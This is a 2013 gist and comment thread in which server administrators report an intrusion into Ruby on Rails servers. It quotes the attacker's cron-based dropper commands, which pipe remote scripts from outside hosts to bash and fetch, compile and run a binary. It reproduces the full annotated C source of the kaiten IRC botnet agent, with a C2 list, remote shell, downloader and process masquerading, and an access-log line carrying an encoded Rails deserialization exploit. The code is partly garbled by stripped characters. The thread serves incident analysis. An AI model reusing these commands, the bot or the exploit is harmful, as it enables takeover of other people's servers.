
@ismasan
Created May 25, 2013 04:55
Some asshole tried to access my servers and run this (they couldn't)
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

bu2 commented May 26, 2013

Hi,

We have the same problem on customer servers dedicated to a custom Ruby on Rails application.
I have noticed different crontabs during the past four days (since the 23rd of May).

On 2013-05-23:

  • 1 * * * wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka

On 2013-05-24:
1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k

Today:
1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;

I suspect (but I have no clue ^^) that the root vulnerability which gives access to the server might be related to Ruby on Rails. We are using:

  • Ruby 1.9.3 p327
  • Ruby On Rails 3.2.11

And we didn't manage to update our servers because we are still in heavy development mode.

We tried changing the root password as a quick fix, but it didn't stop the attacker (I am not even sure that he needs/uses root access, since he overwrites the user-level crontab...).

Regards.


bu2 commented May 26, 2013

Here is the code of kaiten-src.c, a kind of botnet agent which was uploaded and run repeatedly since the first crontab intrusion:

////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////

// NOTE(review): this listing was pasted through markdown, which stripped the
// leading '#' from preprocessor lines and the '*' from pointer declarators
// (e.g. `undef STARTUP` was `#undef STARTUP`, `char servers[]` presumably
// `char *servers[]`); it does not compile as shown. The comments below
// describe the sample for analysts; nothing in the code is corrected.
//
// Build-time configuration. With STARTUP and IDENT undefined, the rc.local
// persistence block and the identd section in main() are compiled out; the
// remaining values are what an analyst will observe on an infected host.
undef STARTUP // Start on startup?

undef IDENT // Only enable this if you absolutely have to

// Process-name masquerade: main() overwrites argv[0] with this string, so the
// bot shows up as "- bash" in ps/htop (matches the htop observation below).
define FAKENAME "- bash" // What you want this to hide as

// IRC C2 rendezvous: channel, key, TCP port and the server list.
define CHAN "#rails" // Channel to join

// Not referenced anywhere in this listing.
define TEMPDIR "/var/tmp" // Where to save generated ips text file

define KEY "" // The key of the channel

// Not referenced anywhere in this listing.
define VERSION "0.1" // dfnctsc-kaiten release version

define PORT 6667 // Port of server(s)

// con() draws servers[rand() % numservers]; numservers is maintained by hand
// and is 1 here although two entries follow, so the random pick always
// yields "cvv4you.ru". The IP entry is only reachable via the SERVER command.
int numservers = 1; // Must change this to equal number of servers down there
char servers[] = {// List the servers in that format, always end in (void)0
"cvv4you.ru",
"188.190.124.120",
(void*) 0
};
////////////////////////////////////////////////////////////////////////////////
// STOP HERE! //
////////////////////////////////////////////////////////////////////////////////

include <stdarg.h>

include <errno.h>

include <stdio.h>

include <stdlib.h>

include <string.h>

include <sys/types.h>

include <sys/stat.h>

include <fcntl.h>

include <strings.h>

include <netinet/in.h>

include <unistd.h>

include <sys/time.h>

include <sys/socket.h>

include <signal.h>

include <arpa/inet.h>

include <netdb.h>

include <time.h>

include <ctype.h>

include <sys/wait.h>

include <sys/ioctl.h>

// Process-wide state shared by the IRC handlers below.
int sock, changeservers = 0; // C2 socket; changeservers is set by SERVER so con() honours `server`
char *server, *chan, *key, *nick, *ident, *user, execfile[256], dispass[256]; // execfile and dispass are never used in this listing
unsigned int *pids; // child pids recorded by mfork(), reaped in main()
unsigned long spoofs = 0, spoofsm = 0, numpids = 0, running = 0; // spoofs/spoofsm are filled by _352(); running is unused here

// Case-insensitive glob match ('*' and '?') of `string` against `pattern`,
// used by _PRIVMSG() to decide whether a "!<nick>" prefix addresses this bot.
// Returns 0 on a match and non-zero otherwise (the '\0' case returns the
// character remaining in `string`). Markdown ate the '*' case label and the
// `*string`/`*pattern` dereferences (shown as `_string`/`_pattern`); the
// switch was presumably `switch (*pattern)`.
int strwildmatch(const char* pattern, const char* string) {
switch (pattern) {
case '\0': return *string;
case '
': return !(!strwildmatch(pattern + 1, string) || _string && !strwildmatch(pattern, string + 1));
case '?': return !(_string && !strwildmatch(pattern + 1, string + 1));
default: return !((toupper(_pattern) == toupper(_string)) && !strwildmatch(pattern + 1, string + 1));
}
}

// printf-style write to an IRC socket. Formats into a fixed 1024-byte static
// buffer with vsprintf — no length bound, so a long argument (a SH output
// line, a GET URL) overruns it — and returns write()'s result, which no
// caller in this listing checks.
int send_msg(int sock, char *words, ...) {
static char textBuffer[1024];
va_list args;
va_start(args, words);
vsprintf(textBuffer, words, args); // unbounded format into textBuffer
va_end(args);
return write(sock, textBuffer, strlen(textBuffer));
}

// fork() and, in the parent, append the child's pid to the global `pids`
// array (grown by copy, old array freed). Returns fork()'s result, so callers
// write `if (mfork(sender) != 0) return;` to continue only in the child.
// `parent` is unsigned, so a failed fork (-1) is not caught by `<= 0` and is
// recorded as a pid; malloc is unchecked. `sender` (originally `char *`) is
// unused.
int mfork(char sender) {
unsigned int parent, *newpids, i;
parent = fork();
if (parent <= 0) return parent; // child (0) returns here; -1 wraps and falls through
numpids++;
newpids = (unsigned int
) malloc((numpids + 1) * sizeof (unsigned int));
for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
newpids[numpids - 1] = parent;
free(pids);
pids = newpids;
return parent;
}

// Strip trailing CR/LF characters in place. On an empty string strlen(a) - 1
// wraps and a[-1] is read.
void filter(char *a) {
while (a[strlen(a) - 1] == '\r' || a[strlen(a) - 1] == '\n') a[strlen(a) - 1] = 0;
}

// Return a freshly malloc'ed 9-character string of random uppercase letters
// (rand() % 26 + 'A'); used for the bot's IRC nick and ident, so nicks of
// this shape in channel logs are an indicator. The return type was `char *`
// before markdown ate the '*'. malloc is unchecked.
char makestring() {
char *tmp;
int len = 9, i;
tmp = (char
) malloc(len + 1);
memset(tmp, 0, len + 1);
for (i = 0; i < len; i++) tmp[i] = (rand() % (91 - 65)) + 65; // 'A'..'Z'
return tmp;
}

// Integer power by recursion. Shadows the C library's pow(), which is what
// the gcc warning "conflicting types for built-in function 'pow'" quoted in
// the error log further down refers to — a compile-time artifact defenders
// can search logs for. Not called anywhere in this listing; a negative
// exponent never terminates.
long pow(long a, long b) {
if (b == 0) return 1;
if (b == 1) return a;
return a * pow(a, b - 1);
}

// 16-bit ones'-complement checksum over `len` bytes: sum 16-bit words, add a
// trailing odd byte, fold the carries, invert. Nothing in this listing calls
// it; together with the raw packet header structs below it looks like a
// leftover from flood routines that this variant does not carry.
u_short in_cksum(u_short *addr, int len) {
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) { // odd trailing byte
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff); // fold carries
sum += (sum >> 16);
answer = ~sum;
return (answer);
}

// "GET <url> <path>" handler: in a forked child, fetch an HTTP URL on port 80
// and write the response body to <path>. This is the bot's second-stage
// download capability. Markdown stripped the '*' from `char *sender`,
// `char **argv`, `FILE *file` and the `(char *)` cast.
//
// Analyst notes:
//  - argv[1] is copied into a 1024-byte stack buffer with strcpy, unbounded.
//  - Only plain http:// on port 80 is supported; the request carries a fixed,
//    dated User-Agent ("Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)")
//    that can be matched in proxy and web-server logs.
//  - Progress is announced to the channel ("Receiving file.", "Saved as"),
//    errors go to the sender via PRIVMSG.
//  - fopen() of the output path is unchecked; the child always exit()s.
void get(int sock, char _sender, int argc, char *_argv) {
int sock2, i, d;
struct sockaddr_in server;
unsigned long ipaddr;
char buf[1024];
FILE file;
unsigned char bufm[4096];
if (mfork(sender) != 0) return; // parent returns, child does the download
if (argc < 2) {
send_msg(sock, "PRIVMSG %s :GET \n", sender);
exit(0);
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
send_msg(sock, "PRIVMSG %s :Unable to create socket.\n", sender);
exit(0);
}
if (!strncmp(argv[1], "http://", 7)) strcpy(buf, argv[1] + 7); // unbounded copy of the URL
else strcpy(buf, argv[1]);
for (i = 0; i < strlen(buf) && buf[i] != '/'; i++); // split host from path at the first '/'
buf[i] = 0;
server.sin_family = AF_INET;
server.sin_port = htons(80);
if ((ipaddr = inet_addr(buf)) == -1) {
struct hostent *hostm;
if ((hostm = gethostbyname(buf)) == NULL) {
send_msg(sock, "PRIVMSG %s :Unable to resolve address.\n", sender);
exit(0);
}
memcpy((char
) &server.sin_addr, hostm->h_addr, hostm->h_length);
} else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (connect(sock2, (struct sockaddr *) &server, sizeof (server)) != 0) {
send_msg(sock, "PRIVMSG %s :Unable to connect to http.\n", sender);
exit(0);
}

// HTTP/1.0 request; path is what followed the first '/', host is the prefix.
send_msg(sock2, "GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n", buf + i + 1, buf);
send_msg(sock, "PRIVMSG %s :Receiving file.\n", chan);
file = fopen(argv[2], "wb"); // unchecked
// Skip the response headers: write whatever follows the first CRLFCRLF in
// the chunk that contains it, then fall through to `done`.
while (1) {
    int i;
    if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
    if (i < 4096) bufm[i] = 0;
    for (d = 0; d < i; d++) if (!strncmp(bufm + d, "\r\n\r\n", 4)) {
            for (d += 4; d < i; d++) fputc(bufm[d], file);
            goto done;
        }
}

done:
send_msg(sock, "PRIVMSG %s :Saved as %s\n", chan, argv[2]);
// Copy the remainder of the body verbatim.
while (1) {
int i, d;
if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
if (i < 4096) bufm[i] = 0;
for (d = 0; d < i; d++) fputc(bufm[d], file);
}
fclose(file);
close(sock2);
exit(0);
}

// "NICK <newnick>" handler: requires exactly one argument (argc here is
// num_params - 1 as passed by _PRIVMSG), rejects nicks of 10+ characters and
// sends the NICK command. The local `nick` is updated only when the server
// echoes the change back and _NICK() sees it.
void nickc(int sock, char _sender, int argc, char *_argv) {
if (argc != 1) {
send_msg(sock, "PRIVMSG %s :NICK \n", sender);
return;
}
if (strlen(argv[1]) >= 10) {
send_msg(sock, "PRIVMSG %s :Nick cannot be larger than 9 characters.\n", sender);
return;
}
send_msg(sock, "NICK %s\n", argv[1]);
}

// Hand-rolled IPv4 header layout (32-bit address fields declared as
// `unsigned long`, which is 64-bit on LP64 targets). Not referenced in this
// listing; see the note on in_cksum().
struct iphdr {
unsigned int ihl : 4, version : 4;
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned long saddr;
unsigned long daddr;
};

// UDP header layout. Not referenced in this listing.
struct udphdr {
unsigned short source;
unsigned short dest;
unsigned short len;
unsigned short check;
};

// TCP header layout (seq/ack as `unsigned long`, same width caveat as
// iphdr). Not referenced in this listing.
struct tcphdr {
unsigned short source;
unsigned short dest;
unsigned long seq;
unsigned long ack_seq;
unsigned short res1 : 4, doff : 4;
unsigned char fin : 1, syn : 1, rst : 1, psh : 1, ack : 1, urg : 1, ece : 1, cwr : 1;
unsigned short window;
unsigned short check;
unsigned short urg_ptr;
};

// Raw IP+TCP packet buffer with 20 bytes of payload. Not referenced here.
struct send_tcp {
struct iphdr ip;
struct tcphdr tcp;
char buf[20];
};

// TCP pseudo-header (addresses, zero byte, protocol, length) followed by the
// TCP header and payload, the layout over which a TCP checksum would be
// computed. Not referenced in this listing.
struct pseudo_header {
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
char buf[20];
};

// Resolve `hostname` (dotted quad or DNS name) to a network-order IPv4
// address. On a resolver failure it reports to `sender` over the global C2
// socket and exit()s — in a non-forked caller that would terminate the bot.
// The result lives in a static `in_addr` shared across calls. Not called in
// this listing.
unsigned int host2ip(char *sender, char *hostname) {
static struct in_addr i;
struct hostent *h;
if ((i.s_addr = inet_addr(hostname)) == -1) {
if ((h = gethostbyname(hostname)) == NULL) {
send_msg(sock, "PRIVMSG %s :Unable to resolve %s\n", sender, hostname);
exit(0);
}
bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
}
return i.s_addr;
}

// "SERVER <host>" handler: point `server` at a strdup of argv[1], set
// changeservers so con() uses it instead of the random pick, and close the
// C2 socket so the main loop's recv() fails and reconnects via `goto sa`.
// The guard tests argc < 1 but then reads argv[1]; the previous strdup is
// leaked; exit(1) on misuse kills the (non-forked) bot.
void move(int sock, char _sender, int argc, char *_argv) {
if (argc < 1) {
send_msg(sock, "PRIVMSG %s :MOVE \n", sender);
exit(1);
}
server = strdup(argv[1]);
changeservers = 1;
close(sock); // forces the read loop to reconnect
}

// "KILL" handler: SIGKILL to the whole process group (pid 0), taking down
// the bot and every child it forked.
void killd(int sock, char _sender, int argc, char *_argv) {
kill(0, 9);
}

// "HELP" handler (forked child): lists the supported commands as NOTICEs to
// the sender. The list matches the `flooders` table plus the IRC and SH forms
// that _PRIVMSG() handles inline; the "SERVER" entry maps to move().
void help(int sock, char _sender, int argc, char *_argv) {
if (mfork(sender) != 0) return;
send_msg(sock, "NOTICE %s :NICK = Changes the nick of the client\n", sender);
send_msg(sock, "NOTICE %s :SERVER = Changes servers\n", sender);
send_msg(sock, "NOTICE %s :KILL = Kills the client\n", sender);
send_msg(sock, "NOTICE %s :GET = Downloads a file off the web and saves it onto the hd\n", sender);
send_msg(sock, "NOTICE %s :HELP = Displays this\n", sender);
send_msg(sock, "NOTICE %s :IRC = send_msgs this command to the server\n", sender);
send_msg(sock, "NOTICE %s :SH = Executes a command\n", sender);
exit(0);
}

// Dispatch table for "!<nick> <CMD> [args]" commands, searched
// case-insensitively by _PRIVMSG(). Despite the name, this variant carries no
// flood commands (compare the help() text). `char *cmd` and the function
// pointer type lost their '*' to markdown; the terminator entry shows the
// intended `void (*func)(int, char *, int, char **)` signature.
struct FMessages {
char cmd;
void (
func)(int, char , int, char *);
} flooders[] = {

{ "NICK", nickc},
{ "SERVER", move},
{ "GET", get},
{ "KILL", killd},
{ "HELP", help},

{ (char *) 0, (void (*)(int, char *, int, char **))0}

};

// PRIVMSG handler — the bot's command interface. `str` is "<target> :<text>";
// `sender` is "nick!user@host" and is truncated to the nick in place.
// Commands are acted on only when the target is the configured channel and
// the text is "!<nickpattern> <CMD> [args]" with the pattern glob-matching
// this bot's nick. Any client in the channel can issue them: no password or
// hostmask check is made here, and the `dispass` global is never consulted.
//   IRC <raw>  — forwarded verbatim to the server
//   SH <cmd>   — run via popen() with a fixed PATH in a forked child; each
//                output line is echoed to the channel, one per second
//   otherwise  — tokenised into at most 10 params and looked up in `flooders`
// Markdown stripped the '*' from `char *sender`, `char *params[12]`, the
// `*message` dereferences and the `(char *)` cast.
void _PRIVMSG(int sock, char _sender, char *str) {
int i;
char *to, *message;
for (i = 0; i < strlen(str) && str[i] != ' '; i++); // target ends at the first space
str[i] = 0;
to = str;
message = str + i + 2; // skip the space and the ':' that precede the text
for (i = 0; i < strlen(sender) && sender[i] != '!'; i++); // keep only the nick part of the prefix
sender[i] = 0;
if (_message == '!' && !strcasecmp(to, chan)) {
char _params[12], name[1024] = {0};
int num_params = 0, m;
message++;
for (i = 0; i < strlen(message) && message[i] != ' '; i++);
message[i] = 0;
if (strwildmatch(message, nick)) return; // 0 means the pattern matches our nick
message += i + 1;
if (!strncmp(message, "IRC ", 4)) send_msg(sock, "%s\n", message + 4); // raw protocol passthrough
if (!strncmp(message, "SH ", 3)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf, 0, 1024);
// The operator's text becomes the shell command line; PATH is pinned so
// the usual binaries resolve regardless of the cron/web environment.
sprintf(buf, "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s", message + 3);
command = popen(buf, "r");
while (!feof(command)) {
memset(buf, 0, 1024);
fgets(buf, 1024, command);
send_msg(sock, "PRIVMSG %s :%s\n", chan, buf); // one channel message per output line
sleep(1);
}
pclose(command);
exit(0);
}
// Command name is the first token; it is copied into `name`.
m = strlen(message);
for (i = 0; i < m; i++) {
if (_message == ' ' || _message == 0) break;
name[i] = message;
message++;
}
// Remaining tokens become params[1..num_params-1], capped at 10.
for (i = 0; i < strlen(message); i++) if (message[i] == ' ') num_params++;
num_params++;
if (num_params > 10) num_params = 10;
params[0] = name;
params[num_params + 1] = "\0"; // terminator; index is at most 11 in a 12-slot array
m = 1;
while (_message != 0) {
message++;
if (m >= num_params) break;
for (i = 0; i < strlen(message) && message[i] != ' '; i++);
params[m] = (char
) malloc(i + 1);
strncpy(params[m], message, i);
params[m][i] = 0;
m++;
message += i;
}
// Dispatch; handlers receive argc = num_params - 1 and argv = params.
for (m = 0; flooders[m].cmd != (char *) 0; m++) {
if (!strcasecmp(flooders[m].cmd, name)) {
flooders[m].func(sock, sender, num_params - 1, params);
for (i = 1; i < num_params; i++) free(params[i]);
return;
}
}
}
}

// Numerics 376 (end of MOTD) and 422 (no MOTD) both route here: the
// post-registration sequence — MODE -ix on our nick, JOIN the configured
// channel with its key, then WHO on our own nick so that _352() can learn
// the host the server sees us from.
void _376(int sock, char *sender, char *str) {
send_msg(sock, "MODE %s -ix\n", nick);
send_msg(sock, "JOIN %s :%s\n", chan, key);
send_msg(sock, "WHO %s\n", nick);
}

// Keepalive: answer the server's PING with a PONG carrying the same token.
void _PING(int sock, char *sender, char *str) {
send_msg(sock, "PONG %s\n", str);
}

// WHO reply (numeric 352) handler; the name lost its leading underscore to
// markdown. Skips five space-separated fields to reach the nick; when it is
// ours and `spoofsm` is still 0, rescans to the fourth field (the host),
// resolves it and stores the first three octets of that address, in reversed
// byte order with the low byte zeroed, in `spoofs`, then sets spoofsm = 256.
// Presumably a source-address prefix for the flood routines that this
// variant does not include; nothing in this listing reads `spoofs`.
// The `(char *)` casts were mangled to `(char` / `(char_)` by markdown.
void 352(int sock, char sender, char *str) {
int i, d;
char *msg = str;
struct hostent *hostm;
unsigned long m;
for (i = 0, d = 0; d < 5; d++) { // advance to the 6th field
for (; i < strlen(str) && *msg != ' '; msg++, i++);
msg++;
if (i == strlen(str)) return;
}
for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
msg[i] = 0;
if (!strcasecmp(msg, nick) && !spoofsm) {
msg = str;
for (i = 0, d = 0; d < 3; d++) { // advance to the 4th field (host)
for (; i < strlen(str) && *msg != ' '; msg++, i++);
msg++;
if (i == strlen(str)) return;
}
for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
msg[i] = 0;
if ((m = inet_addr(msg)) == -1) {
if ((hostm = gethostbyname(msg)) == NULL) {
send_msg(sock, "PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n", sender);
return;
}
memcpy((char
) &m, hostm->h_addr, hostm->h_length);
}
// Byte-reverse the first three octets into spoofs; low byte left 0.
((char
) &spoofs)[3] = ((char_) &m)[0];
((char_) &spoofs)[2] = ((char_) &m)[1];
((char_) &spoofs)[1] = ((char_) &m)[2];
((char*) &spoofs)[0] = 0;
spoofsm = 256;
}
}

// Nickname already in use (433): drop the current nick and generate a new
// random one. No NICK command is sent from here; the new nick goes out with
// the next registration after a reconnect.
void _433(int sock, char *sender, char *str) {
free(nick);
nick = makestring();
}

// NICK change notification: when the client that changed nick is us (the
// prefix, cut at '!', equals our nick), adopt the new nick from `str` with
// its leading ':' stripped. `char *sender` and `*str` lost their '*'.
void _NICK(int sock, char _sender, char *str) {
int i;
for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
sender[i] = 0;
if (!strcasecmp(sender, nick)) {
if (_str == ':') str++;
if (nick) free(nick);
nick = strdup(str);
}
}

// Dispatch table for server-originated messages, keyed by command name or
// numeric and searched case-insensitively by main(). 422 shares the 376
// handler; the `NICK` entry refers to _NICK (underscore eaten by markdown,
// as were the '*' in `char *cmd` and the handler pointer type).
struct Messages {
char cmd;
void (
func)(int, char _, char *);
} msgs[] = {
{ "352", _352},
{ "376", _376},
{ "433", _433},
{ "422", _376},
{ "PRIVMSG", _PRIVMSG},
{ "PING", _PING},
{ "NICK", NICK},
{ (char *) 0, (void (
)(int, char *, char *))0}
};

// Connect — and on any failure reconnect, forever — to a C2 server. Unless
// the SERVER command set `server`, one is drawn from servers[] with rand().
// The socket is switched to non-blocking (FIONBIO) and connect() is retried
// once a second for up to 10 s; resolver or connect failure jumps back to
// `start`, so a bot that cannot reach its C2 loops indefinitely resolving
// and connecting to PORT (6667) — a steady beacon in DNS and flow logs. The
// three setsockopt() calls pass a NULL optval with length 0 and so achieve
// nothing. `struct hostent *hp` and the `(char *)` cast lost their '*'.
void con() {
struct sockaddr_in srv;
unsigned long ipaddr, start;
int flag;
struct hostent hp;
start:
sock = -1;
flag = 1;
if (changeservers == 0) server = servers[rand() % numservers]; // random pick unless SERVER set one
changeservers = 0;
while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0); // busy-spins if socket() keeps failing
if (inet_addr(server) == 0 || inet_addr(server) == -1) {
if ((hp = gethostbyname(server)) == NULL) {
server = NULL;
close(sock);
goto start;
}
bcopy((char
) hp->h_addr, (char*) &srv.sin_addr, hp->h_length);
} else srv.sin_addr.s_addr = inet_addr(server);
srv.sin_family = AF_INET;
srv.sin_port = htons(PORT);
ioctl(sock, FIONBIO, &flag); // non-blocking connect
start = time(NULL);
while (time(NULL) - start < 10) { // up to 10 s of 1 s connect attempts
errno = 0;
if (connect(sock, (struct sockaddr *) &srv, sizeof (srv)) == 0 || errno == EISCONN) {
setsockopt(sock, SOL_SOCKET, SO_LINGER, 0, 0);
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, 0, 0);
setsockopt(sock, SOL_SOCKET, SO_KEEPALIVE, 0, 0);
return;
}
if (!(errno == EINPROGRESS || errno == EALREADY)) break;
sleep(1);
}
server = NULL;
close(sock);
goto start; // never gives up
}

// Single-instance guard: open /tmp/tan.pid and take a non-blocking exclusive
// flock on it; if another instance already holds the lock, print "Lockfile
// found. Exiting." and exit. That exact string shows up in the nginx error
// log quoted further down, presumably because the payload's stdout was the
// web server's. The descriptor is deliberately left open so the lock is held
// for the life of the process; the function is declared int but returns
// nothing. The file's presence and a held lock on it are host indicators.
int lockfile() {
int pid_file = open("/tmp/tan.pid", O_CREAT | O_RDWR, 0666);
int rc = flock(pid_file, LOCK_EX | LOCK_NB);
if (rc && EWOULDBLOCK == errno) {
printf("Lockfile found. Exiting.");
exit(0);
}
}

// Entry point. In order: single-instance lock; (compiled out by the `undef
// STARTUP` above) append own path to /etc/rc.d/rc.local or /etc/rc.conf for
// boot persistence; daemonize with fork(); overwrite argv[0] with FAKENAME
// and zero the remaining argv so the process list shows "- bash"; seed
// rand() and generate nick/ident; then connect and run the IRC read loop:
// select() with a 20-minute timeout, reap finished children out of `pids`,
// split the received buffer on '\n', strip any ":prefix" into `sender`, and
// dispatch each command through `msgs`. Every error, timeout or "ERROR" line
// jumps to `sa` and reconnects. The IDENT section calls identd(), which is
// not defined in this listing. The `ifdef`/`endif` lines lost their '#'.
int main(int argc, char **argv) {
lockfile();
int on, i;
char cwd[256], *str;
FILE *file;

ifdef STARTUP

// Persistence: add "<cwd><basename>" to the first of rc.local / rc.conf
// that exists, unless an identical line is already present.
str = "/etc/rc.d/rc.local";
file = fopen(str, "r");
if (file == NULL) {
    str = "/etc/rc.conf";
    file = fopen(str, "r");
}
if (file != NULL) {
    char outfile[256], buf[1024];
    int i = strlen(argv[0]), d = 0;
    getcwd(cwd, 256);
    if (strcmp(cwd, "/")) {
        while (argv[0][i] != '/') i--;
        sprintf(outfile, "\"%s%s\"\n", cwd, argv[0] + i);
        while (!feof(file)) {
            fgets(buf, 1024, file);
            if (!strcasecmp(buf, outfile)) d++;
        }
        if (d == 0) {
            FILE *out;
            fclose(file);
            out = fopen(str, "a");
            if (out != NULL) {
                fputs(outfile, out);
                fclose(out);
            }
        } else fclose(file);
    } else fclose(file);
}

endif

if (fork()) exit(0); // detach from the parent (cron/shell)

ifdef FAKENAME

// Process-name masquerade, limited to the original argv[0] length; the
// remaining arguments are blanked so ps shows only "- bash".
strncpy(argv[0], FAKENAME, strlen(argv[0]));
for (on = 1; on < argc; on++) memset(argv[on], 0, strlen(argv[on]));

endif

srand((time(NULL) ^ getpid()) + getppid());
nick = makestring();
ident = makestring();
user = "raft";
chan = CHAN;
key = KEY;
server = NULL;

sa:

ifdef IDENT

// Kill and reap all recorded children before starting the identd helper.
for (i = 0; i < numpids; i++) {
    if (pids[i] != 0 && pids[i] != getpid()) {
        kill(pids[i], 9);
        waitpid(pids[i], NULL, WNOHANG);
    }
}
pids = NULL;
numpids = 0;
identd(); // not defined in this listing

endif

con();
send_msg(sock, "NICK %s\nUSER %s localhost localhost :%s\n", nick, ident, user); // IRC registration
while (1) {
    unsigned long i;
    fd_set n;
    struct timeval tv;
    FD_ZERO(&n);
    FD_SET(sock, &n);
    tv.tv_sec = 60 * 20;
    tv.tv_usec = 0;
    if (select(sock + 1, &n, (fd_set*) 0, (fd_set*) 0, &tv) <= 0) goto sa; // 20 min idle or error -> reconnect
    // Reap exited children and compact them out of `pids`.
    for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
            unsigned int *newpids, on;
            for (on = i + 1; on < numpids; on++) pids[on - 1] = pids[on];
            pids[on - 1] = 0;
            numpids--;
            newpids = (unsigned int*) malloc((numpids + 1) * sizeof (unsigned int));
            for (on = 0; on < numpids; on++) newpids[on] = pids[on];
            free(pids);
            pids = newpids;
        }
    if (FD_ISSET(sock, &n)) {
        char buf[4096], *str;
        int i;
        if ((i = recv(sock, buf, 4096, 0)) <= 0) goto sa;
        buf[i] = 0; // a full 4096-byte read makes this a one-past-the-end write
        str = strtok(buf, "\n");
        while (str && *str) {
            char name[1024], sender[1024];
            filter(str);
            // Lines of the form ":prefix CMD args" — prefix goes to `sender`,
            // everything else shifts left. strcpy is unbounded: a line is up to
            // 4096 bytes, the targets 1024.
            if (*str == ':') {
                for (i = 0; i < strlen(str) && str[i] != ' '; i++);
                str[i] = 0;
                strcpy(sender, str + 1);
                strcpy(str, str + i + 1);
            } else strcpy(sender, "*");
            for (i = 0; i < strlen(str) && str[i] != ' '; i++);
            str[i] = 0;
            strcpy(name, str);
            strcpy(str, str + i + 1);
            for (i = 0; msgs[i].cmd != (char *) 0; i++) if (!strcasecmp(msgs[i].cmd, name)) msgs[i].func(sock, sender, str); // dispatch by command/numeric
            if (!strcasecmp(name, "ERROR")) goto sa;
            str = strtok((char*) NULL, "\n");
        }
    }
}
return 0;

}


Netmisa commented May 26, 2013

Hi,

Ok, that's why I asked if one of you has Redmine, because I found interesting logs.

I think he uses "/login?back_url="

nginx/access.log (My redmine)

17510: 88.198.20.247 - - [24/May/2013:15:17:34 +0200] "HEAD / HTTP/1.1" 302 0 "-" "-" "-"
.....
17584: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "POST / HTTP/1.1" 302 1256 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17585: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4006 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
